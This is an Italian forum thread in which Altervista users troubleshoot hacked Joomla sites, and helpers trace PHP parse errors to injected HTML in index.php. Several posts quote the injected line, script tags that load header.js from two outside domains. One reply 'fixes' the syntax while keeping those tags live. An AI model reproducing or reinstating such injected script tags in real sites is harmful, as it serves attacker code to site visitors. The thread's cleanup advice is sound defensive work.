Malware sul sito

Salve! Da poco mi compare questa scritta quando cerco di arrivare al mio sito
Parse error: syntax error, unexpected '<' in /membri/fantamici/index.php on line 55
come mai? Ci tengo a specificare che non ho effettuato alcuna modifica! E' accaduto all'improvviso!!!

EDIT
update: anche un altro sito web di mia proprietà risulta essere irraggiungibile! eppure ieri era tutto ok! ecco il messaggio che mi appare sull'altro sito:
Parse error: syntax error, unexpected '<' in /membri/mdwebsolutions/administrator/index.php on line 59 (pagina di amministrazione)
Parse error: syntax error, unexpected '<' in /membri/mdwebsolutions/index.php on line 55 (sito vero e proprio)
aiuto non so cosa fare!!!!!

[dreadnaut]

Se apri uno di quei file e guardi alla riga 55, cosa ci trovi?

Se apri uno di quei file e guardi alla riga 55, cosa ci trovi?

Grazie per aver risposto! Io uso joomla! Come arrivo a quel file?!

[dreadnaut]

Via pannello di altervista (gestione file), o ftp (filezilla)?

Via pannello di altervista (gestione file), o ftp (filezilla)?

Come ti risulta più comodo! Posso accedere sia via pannello sia via ftp!

[bennyemarta]

Idem anche per me. nessuno ha una soluzione? grazie anticipatamente
io solla riga 54 dell'index trovo scritto questo: echo $app;<html><body><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>
mentre sulla riga 58 index administrator trovo: echo $app;
io non ci capisco un tubooooo

[dreadnaut]

Come ti risulta più comodo! Posso accedere sia via pannello sia via ftp!

Ottimo! Allora fallo e posta la riga 55 qua!

Ottimo! Allora fallo e posta la riga 55 qua!

Il problema è che non so che path seguire per arrivare al file! Se digito quel percorso nel browser mi dice che il file non esiste! :(

[dreadnaut]

Quando ti colleghi via ftp, o guardi via pannello, cominci già in "/membri/fantamici/". A quel punto ti basta prendere il file index.php che è subito li.

Quando ti colleghi via ftp, o guardi via pannello, cominci già in "/membri/fantamici/". A quel punto ti basta prendere il file index.php che è subito li.

E' proprio questo il problema! Il path /membri/fantamici NON esiste!!!!!
Eccoti lo screen del pannello! http://i42.tinypic.com/aynhgw.png

EDIT:
La stessa cosa vale anche per l'altro mio sito: mdwebsolutions.altervista.org

[dreadnaut]

Come ho già scritto, il pannello si apre già in /membri/fantamici, è quello che vedi davanti a te.

Come ho già scritto, il pannello si apre già in /membri/fantamici, è quello che vedi davanti a te.

Perdonami, ho mal interpretato le tue parole; in ogni caso alla riga 55 mi appare questo:

Codice:

// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>

E questo è l'intero index.php

Codice:

<?php
/**
 * @version		$Id: index.php 20806 2011-02-21 19:44:59Z dextercowley $
 * @package		Joomla.Site
 * @copyright	Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
	include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
	define('JPATH_BASE', dirname(__FILE__));
	require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>

[alemoppo]

Non ti assicuro che funzioni (anche perché joomla non l'ho mai usato), però sintatticamente, il codice corretto sarebbe:

Codice PHP:

<?php
/**
* @version $Id: index.php 20806 2011-02-21 19:44:59Z dextercowley $
* @package Joomla.Site
* @copyright Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
define('JPATH_BASE', dirname(__FILE__));
require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app;
?>
<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>

...Poi, semanticamente non ne ho idea di come funzioni joomla..

Ciao!

[dreadnaut]

Codice PHP:

// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>


Quel pezzo di html dopo echo $app;" sembra aggiunto a caso, e punta a file esterni al tuo sito. Sembra che la tua installazione di Joomla sia stata infettata. Questo può essere avvenuto direttamente online, oppure via malware presente sul tuo computer.

Cancella quel pezzo di html ed il sito dovrebbe riapparire. Controlla inoltre che Joomla sia aggiornato (dovrebbe esserlo) e che il tuo computer sia pulito.

Codice PHP:

// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>


Quel pezzo di html dopo echo $app;" sembra aggiunto a caso, e punta a file esterni al tuo sito. Sembra che la tua installazione di Joomla sia stata infettata. Questo può essere avvenuto direttamente online, oppure via malware presente sul tuo computer.

Cancella quel pezzo di html ed il sito dovrebbe riapparire. Controlla inoltre che Joomla sia aggiornato (dovrebbe esserlo) e che il tuo computer sia pulito.

Ho cancellato quel pezzo però il sito non è altro che una pagina bianca su cui non appare alcun messaggio! :(

EDIT:
RISOLTO!!! Praticamente a questo codice

Codice:

// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script><script type="text/javascript" src="http://www.fatsagundem.com/plugins/user/header.js"></script></body></html>

bisogna cancellare tutto e lasciare

Codice:

echo $app;

Mille grazie per l'assistenza! Siete fantastici! ;)

Salve! C'è qualcuno che sa come disinfettare un sito/spazio web affetto da un virus?
Grazie!

[karl94]

Come per ogni malware è necessario rimuovere il codice malevolo ed eventualmente ripristinare le modifiche effettuate da questo.
La procedura dunque è differente da caso a caso.

Ho capito! Ho effettuato una scansione con urlvoid.com...è attendibile?
In ogni caso mi riporta questo tipo di "messaggio":
Scanning site with: Malc0de DETECTED

EDIT:
Il problema in questione è stato descritto anche qui: http://forum.it.altervista.org/jooml...la-joomla.html

[karl94]

Non mi sembra sia rimasta traccia del malware, per sicurezza effettua scansioni con un buon antimalware nei computer che hai utilizzato per accedere agli spazi web infettati.

Non mi sembra sia rimasta traccia del malware, per sicurezza effettua scansioni con un buon antimalware nei computer che hai utilizzato per accedere agli spazi web infettati.

Grazie per l'assistenza! Sapresti consigliarmi un buon antimalware?!

[dreadnaut]

http://windows.microsoft.com/mse ?

http://windows.microsoft.com/mse ?

MSE è un buon programma?

[dreadnaut]

Fra quelli che ho visto, si. Soprattutto è meno tignoso degli altri.

Salve, nonostante i miei tentativi il malware che impedisce la normale visualizzazione dei miei siti (fantamici.altervista.org - mdwebsolutions.altervista.org) continua ad imperversare! Qualcuno sa come risolvere del tutto questo problema?

Ecco l'errore che visualizzo quando apro mdwebsolutions:

Parse error: syntax error, unexpected '>' in /membri/mdwebsolutions/index.php on line 55

Ecco il file incriminato:

Codice:

<?php
/**
 * @version		$Id: index.php 20806 2011-02-21 19:44:59Z dextercowley $
 * @package		Joomla.Site
 * @copyright	Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
 * @license		GNU General Public License version 2 or later; see LICENSE.txt
 */

// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);

if (file_exists(dirname(__FILE__) . '/defines.php')) {
	include_once dirname(__FILE__) . '/defines.php';
}

if (!defined('_JDEFINES')) {
	define('JPATH_BASE', dirname(__FILE__));
	require_once JPATH_BASE.'/includes/defines.php';
}

require_once JPATH_BASE.'/includes/framework.php';

// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;

// Instantiate the application.
$app = JFactory::getApplication('site');

// Initialise the application.
$app->initialise();

// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;

// Route the application.
$app->route();

// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;

// Dispatch the application.
$app->dispatch();

// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;

// Render the application.
$app->render();

// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;

// Return the response.
echo $app<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>;

Ed ecco dove risiede il problema!

Codice:

Return the response.
echo $app<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>;

Questa è la quarta volta che questa maledetta stringa ricompare! Non so più cosa fare!!!! Qualcuno ha già affrontato difficoltà del genere? Grazie

Non sono esperto di malware, però se la riga ricompare presumo sia perché da qualche parte sul tuo spazio web c'è un codice che viene eseguito e ti modifica la pagina in questione.

Può essere un componente .php di joomla modificatosi in qualche modo o qualche javascript infilatosi mentre ha fatto un FTP.

Io farei così (magari i più esperti conoscono una scorciatoia):

1) Per prima cosa controlla il tuo PC e fai una bella scansione con un buon antivirus, prima di entrare ad amministrare via pannello di controllo Altervista i files. Meglio sarebbe usare un PC con linux a bordo, sei più sicuro; puoi usare una distro live. Se il tuo PC è infetto vai in loop infinito.

2) cambia tutte le password sia di Altervista, sia di joomla sia del DB Mysql. Dopo aver sterilizzato il PC, altrimenti potresti essere punto a capo.

3) controlla che nella tabella "user" di joomla su Mysql (usa phpmyadmin) non vi siano altri utenti con privilegi amministrativi. Se il tuo sito non ha registrati deve esserci solo il tuo utente. Spero che il malware non abbia fatto pasticci anche su qualche campo/tabella di Mysql (Sql Injection, credo si chiami così il fenomeno).

4) a mano controlla tutti i files da pannello di controllo altervista. Guarda quelli che hanno una data di modifica recente. Se trovi un file .php modificato o file .js potrebbe contenere il codice malevolo.

5) Hai per caso installato estensioni di terze parti? Potrebbe essere anche quella la causa. Magari avevano un baco di sicurezza nel codice.

Se vuoi che proviamo assieme in chat mandami un M.P. che fissiamo un appuntamento.

Ciao.